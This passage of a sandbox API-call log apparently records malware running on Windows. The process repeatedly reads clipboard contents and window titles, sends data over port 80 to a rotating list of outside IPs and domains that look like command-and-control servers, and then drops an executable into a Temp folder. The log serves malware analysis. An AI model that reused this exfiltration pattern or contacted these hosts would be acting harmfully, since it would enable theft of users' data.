buf=0x8f1cf22*, len=1772, flags=0) returned 1772 [0257.905] closesocket (s=0x22e8) returned 0 [0257.906] socket (af=2, type=1, protocol=6) returned 0x22e8 [0257.906] connect (s=0x22e8, name=0xb269cb0*(sa_family=2, sin_port=0x50, sin_addr="104.21.94.157"), namelen=16) returned 0 [0257.931] send (s=0x22e8, buf=0x8f3a322*, len=171, flags=0) returned 171 [0257.932] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0257.932] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 751 [0258.017] closesocket (s=0x22e8) returned 0 [0258.017] Sleep (dwMilliseconds=0x1388) [0258.019] OpenClipboard (hWndNewOwner=0x0) returned 1 [0258.019] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0258.019] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0258.019] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0258.019] CloseClipboard () returned 1 [0258.019] Sleep (dwMilliseconds=0x1388) [0258.020] Sleep (dwMilliseconds=0x1388) [0258.022] Sleep (dwMilliseconds=0x1388) [0258.023] Sleep (dwMilliseconds=0x1388) [0258.025] OpenClipboard (hWndNewOwner=0x0) returned 1 [0258.025] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0258.025] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0258.025] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0258.025] CloseClipboard () returned 1 [0258.025] socket (af=2, type=1, protocol=6) returned 0x22e8 [0258.026] connect (s=0x22e8, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0258.084] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0258.085] send (s=0x22e8, buf=0x8f1cf22*, len=1796, flags=0) returned 1796 [0258.085] closesocket (s=0x22e8) returned 0 [0258.085] socket (af=2, type=1, protocol=6) returned 0x22e8 [0258.086] connect (s=0x22e8, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0258.156] send (s=0x22e8, buf=0x8f3a322*, len=176, flags=0) returned 176 [0258.156] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0258.157] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 5276 [0258.241] closesocket (s=0x22e8) returned 0 [0258.242] Sleep (dwMilliseconds=0x1388) [0258.243] OpenClipboard (hWndNewOwner=0x0) returned 1 [0258.243] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0258.244] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0258.244] GlobalUnlock (hMem=0xafaa690) returned 1 [0258.244] CloseClipboard () returned 1 [0258.244] socket (af=2, type=1, protocol=6) returned 0x22e8 [0258.244] connect (s=0x22e8, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0258.388] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0258.388] send (s=0x22e8, buf=0x8f1cf22*, len=1787, flags=0) returned 1787 [0258.388] closesocket (s=0x22e8) returned 0 [0258.389] socket (af=2, type=1, protocol=6) returned 0x22e8 [0258.389] connect (s=0x22e8, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0258.527] send (s=0x22e8, buf=0x8f3a322*, len=173, flags=0) returned 173 [0258.527] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0258.528] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0259.028] closesocket (s=0x22e8) returned 0 [0259.028] Sleep (dwMilliseconds=0x1388) [0259.030] OpenClipboard (hWndNewOwner=0x0) returned 1 [0259.030] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0259.030] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0259.030] GlobalUnlock (hMem=0xafaa690) returned 1 [0259.030] CloseClipboard () returned 1 [0259.030] socket (af=2, type=1, protocol=6) returned 0x22e8 [0259.030] connect (s=0x22e8, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0259.072] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0259.072] send (s=0x22e8, buf=0x8f1cf22*, len=1829, flags=0) returned 1829 [0259.073] closesocket (s=0x22e8) returned 0 [0259.074] socket (af=2, type=1, protocol=6) returned 0x22e8 [0259.074] connect (s=0x22e8, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0259.112] send (s=0x22e8, buf=0x8f3a322*, len=187, flags=0) returned 187 [0259.113] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0259.113] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 4225 [0259.178] closesocket (s=0x22e8) returned 0 [0259.179] Sleep (dwMilliseconds=0x1388) [0259.180] OpenClipboard (hWndNewOwner=0x0) returned 1 [0259.180] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0259.181] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0259.181] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0259.181] CloseClipboard () returned 1 [0259.181] socket (af=2, type=1, protocol=6) returned 0x22e8 [0259.181] connect (s=0x22e8, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0259.218] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0259.218] send (s=0x22e8, buf=0x8f1cf22*, len=1799, flags=0) returned 1799 [0259.219] closesocket (s=0x22e8) returned 0 [0259.219] socket (af=2, type=1, protocol=6) returned 0x22e8 [0259.220] connect (s=0x22e8, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0259.261] send (s=0x22e8, buf=0x8f3a322*, len=177, flags=0) returned 177 [0259.263] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0259.263] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 926 [0259.322] closesocket (s=0x22e8) returned 0 [0259.323] Sleep (dwMilliseconds=0x1388) [0259.324] OpenClipboard (hWndNewOwner=0x0) returned 1 [0259.324] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0259.324] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0259.324] GlobalUnlock (hMem=0xafaa690) returned 1 [0259.324] CloseClipboard () returned 1 [0259.324] socket (af=2, type=1, protocol=6) returned 0x22e8 [0259.325] connect (s=0x22e8, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0259.344] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0259.344] send (s=0x22e8, buf=0x8f1cf22*, len=1796, flags=0) returned 1796 [0259.345] closesocket (s=0x22e8) returned 0 [0259.345] socket (af=2, type=1, protocol=6) returned 0x22e8 [0259.346] connect (s=0x22e8, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0259.374] send (s=0x22e8, buf=0x8f3a322*, len=176, flags=0) returned 176 [0259.374] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0259.374] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0259.875] closesocket (s=0x22e8) returned 0 [0259.876] Sleep (dwMilliseconds=0x1388) [0259.877] OpenClipboard (hWndNewOwner=0x0) returned 1 [0259.877] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0259.877] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0259.877] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0259.877] CloseClipboard () returned 1 [0259.877] socket (af=2, type=1, protocol=6) returned 0x22e8 [0259.878] connect (s=0x22e8, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0260.050] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0260.050] send (s=0x22e8, buf=0x8f1cf22*, len=1799, flags=0) returned 1799 [0260.051] closesocket (s=0x22e8) returned 0 [0260.052] socket (af=2, type=1, protocol=6) returned 0x22e8 [0260.052] connect (s=0x22e8, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0260.231] send (s=0x22e8, buf=0x8f3a322*, len=177, flags=0) returned 177 [0260.231] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0260.231] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0260.404] closesocket (s=0x22e8) returned 0 [0260.404] Sleep (dwMilliseconds=0x1388) [0260.405] OpenClipboard (hWndNewOwner=0x0) returned 1 [0260.405] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0260.406] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0260.406] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0260.406] CloseClipboard () returned 1 [0260.406] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0260.408] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0260.409] Sleep (dwMilliseconds=0x1388) [0260.411] Sleep (dwMilliseconds=0x1388) [0260.412] Sleep (dwMilliseconds=0x1388) [0260.414] Sleep (dwMilliseconds=0x1388) [0260.415] Sleep (dwMilliseconds=0x1388) [0260.417] Sleep (dwMilliseconds=0x1388) [0260.418] OpenClipboard (hWndNewOwner=0x0) returned 1 [0260.418] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0260.419] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0260.419] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0260.419] CloseClipboard () returned 1 [0260.419] socket (af=2, type=1, protocol=6) returned 0x22e8 [0260.419] connect (s=0x22e8, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0260.678] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0260.678] send (s=0x22e8, buf=0x8f1cf22*, len=1811, flags=0) returned 1811 [0260.679] closesocket (s=0x22e8) returned 0 [0260.679] socket (af=2, type=1, protocol=6) returned 0x22e8 [0260.679] connect (s=0x22e8, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0260.946] send (s=0x22e8, buf=0x8f3a322*, len=181, flags=0) returned 181 [0260.947] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0260.947] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 367 [0261.237] closesocket (s=0x22e8) returned 0 [0261.237] Sleep (dwMilliseconds=0x1388) [0261.239] OpenClipboard (hWndNewOwner=0x0) returned 1 [0261.239] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0261.239] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0261.239] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0261.240] CloseClipboard () returned 1 [0261.337] socket (af=2, type=1, protocol=6) returned 0x22e8 [0261.337] getaddrinfo (in: pNodeName="www.communication.services", pServiceName="80", pHints=0xb293638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293668 | out: ppResult=0xb293668*=0x0) returned 11002 [0265.848] Sleep (dwMilliseconds=0x1388) [0265.850] OpenClipboard (hWndNewOwner=0x0) returned 1 [0265.850] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0265.850] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0265.850] GlobalUnlock (hMem=0xafaa690) returned 1 [0265.850] CloseClipboard () returned 1 [0265.850] socket (af=2, type=1, protocol=6) returned 0xdfc [0265.851] getaddrinfo (in: pNodeName="www.skindefense5.com", pServiceName="80", pHints=0xb2939d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293a08 | out: ppResult=0xb293a08*=0xb0e3330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26ab50*(sa_family=2, sin_port=0x50, sin_addr="64.190.62.111"), ai_next=0x0)) returned 0 [0265.978] connect (s=0xdfc, name=0xb26ab50*(sa_family=2, sin_port=0x50, sin_addr="64.190.62.111"), namelen=16) returned 0 [0266.011] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0266.011] send (s=0xdfc, buf=0x8f1cf22*, len=1793, flags=0) returned 1793 [0266.012] closesocket (s=0xdfc) returned 0 [0266.012] socket (af=2, type=1, protocol=6) returned 0xdfc [0266.012] connect (s=0xdfc, name=0xb26ab50*(sa_family=2, sin_port=0x50, sin_addr="64.190.62.111"), namelen=16) returned 0 [0266.038] send (s=0xdfc, buf=0x8f3a322*, len=176, flags=0) returned 176 [0266.039] setsockopt (s=0xdfc, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0266.039] recv (in: s=0xdfc, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 774 [0266.117] closesocket (s=0xdfc) returned 0 [0266.118] Sleep (dwMilliseconds=0x1388) [0266.119] OpenClipboard (hWndNewOwner=0x0) returned 1 [0266.119] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0266.119] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0266.119] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0266.120] CloseClipboard () returned 1 [0266.120] socket (af=2, type=1, protocol=6) returned 0xdfc [0266.120] getaddrinfo (in: pNodeName="www.eleonoritalia.com", pServiceName="80", pHints=0xb293d78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293da8 | out: ppResult=0xb293da8*=0xb0e26b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26aa90*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), ai_next=0x0)) returned 0 [0266.122] connect (s=0xdfc, name=0xb26aa90*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0266.180] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0266.180] send (s=0xdfc, buf=0x8f1cf22*, len=1796, flags=0) returned 1796 [0266.180] closesocket (s=0xdfc) returned 0 [0266.181] socket (af=2, type=1, protocol=6) returned 0xdfc [0266.181] connect (s=0xdfc, name=0xb26aa90*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0266.243] send (s=0xdfc, buf=0x8f3a322*, len=177, flags=0) returned 177 [0266.244] setsockopt (s=0xdfc, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0266.245] recv (in: s=0xdfc, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 5277 [0266.326] closesocket (s=0xdfc) returned 0 [0266.327] Sleep (dwMilliseconds=0x1388) [0266.329] OpenClipboard (hWndNewOwner=0x0) returned 1 [0266.329] GetClipboardData (uFormat=0xd) returned 0xafaa5a0 [0266.329] GlobalLock (hMem=0xafaa5a0) returned 0xafaa5a0 [0266.329] GlobalUnlock (hMem=0xafaa5a0) returned 1 [0266.329] CloseClipboard () returned 1 [0266.329] socket (af=2, type=1, protocol=6) returned 0xdfc [0266.329] getaddrinfo (in: pNodeName="www.healthybalancedliving.com", pServiceName="80", pHints=0xb294118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294148 | out: ppResult=0xb294148*=0xb0e23b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26ac50*(sa_family=2, sin_port=0x50, sin_addr="3.130.253.23"), ai_next=0xb0e2430*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26a890*(sa_family=2, sin_port=0x50, sin_addr="3.130.204.160"), ai_next=0x0))) returned 0 [0266.463] connect (s=0xdfc, name=0xb26ac50*(sa_family=2, sin_port=0x50, sin_addr="3.130.253.23"), namelen=16) returned 0 [0266.578] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0266.578] send (s=0xdfc, buf=0x8f1cf22*, len=1820, flags=0) returned 1820 [0266.579] closesocket (s=0xdfc) returned 0 [0266.579] socket (af=2, type=1, protocol=6) returned 0xdfc [0266.580] connect (s=0xdfc, name=0xb26ac50*(sa_family=2, sin_port=0x50, sin_addr="3.130.253.23"), namelen=16) returned 0 [0266.697] send (s=0xdfc, buf=0x8f3a322*, len=185, flags=0) returned 185 [0266.697] setsockopt (s=0xdfc, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0266.697] recv (in: s=0xdfc, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 183 [0266.878] closesocket (s=0xdfc) returned 0 [0266.878] Sleep (dwMilliseconds=0x1388) [0266.880] OpenClipboard (hWndNewOwner=0x0) returned 1 [0266.880] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0266.880] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0266.880] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0266.880] CloseClipboard () returned 1 [0266.881] socket (af=2, type=1, protocol=6) returned 0xdfc [0266.881] getaddrinfo (in: pNodeName="www.punkidz.com", pServiceName="80", pHints=0xb2944b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb2944e8 | out: ppResult=0xb2944e8*=0xb0e2c30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26aad0*(sa_family=2, sin_port=0x50, sin_addr="156.234.182.39"), ai_next=0x0)) returned 0 [0269.597] connect (s=0xdfc, name=0xb26aad0*(sa_family=2, sin_port=0x50, sin_addr="156.234.182.39"), namelen=16) returned 0 [0269.822] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0269.822] send (s=0xdfc, buf=0x8f1cf22*, len=1778, flags=0) returned 1778 [0269.823] closesocket (s=0xdfc) returned 0 [0269.824] socket (af=2, type=1, protocol=6) returned 0xdfc [0269.825] connect (s=0xdfc, name=0xb26aad0*(sa_family=2, sin_port=0x50, sin_addr="156.234.182.39"), namelen=16) returned 0 [0270.033] send (s=0xdfc, buf=0x8f3a322*, len=171, flags=0) returned 171 [0270.033] setsockopt (s=0xdfc, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0270.033] recv (in: s=0xdfc, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 1004 [0270.418] closesocket (s=0xdfc) returned 0 [0270.418] Sleep (dwMilliseconds=0x1388) [0270.420] OpenClipboard (hWndNewOwner=0x0) returned 1 [0270.420] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0270.420] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0270.420] GetForegroundWindow () returned 0x2013a [0270.420] GetWindowTextW (in: hWnd=0x2013a, lpString=0x8f142a2, nMaxCount=260 | out: lpString="Blank Page - Internet Explorer") returned 30 [0270.420] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0270.420] CloseClipboard () returned 1 [0270.420] socket (af=2, type=1, protocol=6) returned 0xdfc [0270.420] getaddrinfo (in: pNodeName="www.lochnas.com", pServiceName="80", pHints=0xb294858*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294888 | out: ppResult=0xb294888*=0xb0e38f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26aa50*(sa_family=2, sin_port=0x50, sin_addr="192.64.119.254"), ai_next=0x0)) returned 0 [0270.514] connect (s=0xdfc, name=0xb26aa50*(sa_family=2, sin_port=0x50, sin_addr="192.64.119.254"), namelen=16) returned 0 [0280.562] RtlIntegerToChar (in: Value=0x681, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1665") returned 0x0 [0280.562] send (s=0xdfc, buf=0x8f1cf22*, len=2062, flags=0) returned 2062 [0280.563] closesocket (s=0xdfc) returned 0 [0280.577] socket (af=2, type=1, protocol=6) returned 0xdfc [0280.578] connect (s=0xdfc, name=0xb26aa50*(sa_family=2, sin_port=0x50, sin_addr="192.64.119.254"), namelen=16) returned 0 [0283.775] send (s=0xdfc, buf=0x8f3a322*, len=171, flags=0) returned 171 [0283.776] setsockopt (s=0xdfc, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0283.776] recv (in: s=0xdfc, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0284.276] closesocket (s=0xdfc) returned 0 [0284.277] Sleep (dwMilliseconds=0x1388) [0284.292] OpenClipboard (hWndNewOwner=0x0) returned 1 [0284.292] GetClipboardData (uFormat=0xd) returned 0xafaa5a0 [0284.292] GlobalLock (hMem=0xafaa5a0) returned 0xafaa5a0 [0284.292] GetForegroundWindow () returned 0x2013a [0284.292] GetWindowTextW (in: hWnd=0x2013a, lpString=0x8f142a2, nMaxCount=260 | out: lpString="Blank Page - Internet Explorer") returned 30 [0284.309] GlobalUnlock (hMem=0xafaa5a0) returned 1 [0284.309] CloseClipboard () returned 1 [0284.310] socket (af=2, type=1, protocol=6) returned 0xdfc [0284.310] getaddrinfo (in: pNodeName="www.senerants.tech", pServiceName="80", pHints=0xb294bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294c28 | out: ppResult=0xb294c28*=0x0) returned 11002 [0284.898] getaddrinfo (in: pNodeName="www.senerants.tech", pServiceName="80", pHints=0xb294bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294c28 | out: ppResult=0xb294c28*=0x0) returned 11002 [0284.901] Sleep (dwMilliseconds=0x1388) [0284.903] OpenClipboard (hWndNewOwner=0x0) returned 1 [0284.903] GetClipboardData (uFormat=0xd) returned 0xafaa7d0 [0284.903] GlobalLock (hMem=0xafaa7d0) returned 0xafaa7d0 [0284.903] GlobalUnlock (hMem=0xafaa7d0) returned 1 [0284.903] CloseClipboard () returned 1 [0284.903] socket (af=2, type=1, protocol=6) returned 0x22c0 [0284.903] getaddrinfo (in: pNodeName="www.dashmints.com", pServiceName="80", pHints=0xb294f98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294fc8 | out: ppResult=0xb294fc8*=0xb0e33f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26ab70*(sa_family=2, sin_port=0x50, sin_addr="162.0.231.244"), ai_next=0x0)) returned 0 [0285.012] connect (s=0x22c0, name=0xb26ab70*(sa_family=2, sin_port=0x50, sin_addr="162.0.231.244"), namelen=16) returned 0 [0285.205] RtlIntegerToChar (in: Value=0x79d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1949") returned 0x0 [0285.206] send (s=0x22c0, buf=0x8f1cf22*, len=2352, flags=0) returned 2352 [0285.207] Sleep (dwMilliseconds=0x7d0) [0285.208] closesocket (s=0x22c0) returned 0 [0285.209] socket (af=2, type=1, protocol=6) returned 0x22c0 [0285.209] connect (s=0x22c0, name=0xb26ab70*(sa_family=2, sin_port=0x50, sin_addr="162.0.231.244"), namelen=16) returned 0 [0285.389] send (s=0x22c0, buf=0x8f3a322*, len=172, flags=0) returned 172 [0285.391] Sleep (dwMilliseconds=0x7d0) [0285.393] setsockopt (s=0x22c0, level=65535, optname=4102, optval="¸\x0b", optlen=4) returned 0 [0285.393] recv (in: s=0x22c0, buf=0x10c8b56c, len=2048000, flags=0 | out: buf=0x10c8b56c*) returned 459 [0285.692] recv (in: s=0x22c0, buf=0x10c8b737, len=2047541, flags=0 | out: buf=0x10c8b737) returned 0 [0285.692] closesocket (s=0x22c0) returned 0 [0287.085] Sleep (dwMilliseconds=0x1388) [0287.155] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.161] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0xffffffffffffffff, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0287.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0287.259] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da740) returned 1 [0287.259] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xmpxd9"), lpSecurityAttributes=0x0) returned 1 [0287.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285f910, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0287.261] NtCreateFile (in: FileHandle=0x1285f8b0, DesiredAccess=0x12019f, ObjectAttributes=0x1285f920*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285f8c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285f8b0*=0x22c0, IoStatusBlock=0x1285f8c0*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0287.262] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285f830 | out: HeapArray=0x1285f830*=0x570000) returned 0x6 [0287.262] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xaff6f20) returned 1 [0287.269] NtQueryInformationFile (in: FileHandle=0x22c0, IoStatusBlock=0x1285f8c0, FileInformation=0x1285f8d0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285f8c0, FileInformation=0x1285f8d0) returned 0x0 [0287.277] NtWriteFile (in: FileHandle=0x22c0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x1285f8c0, 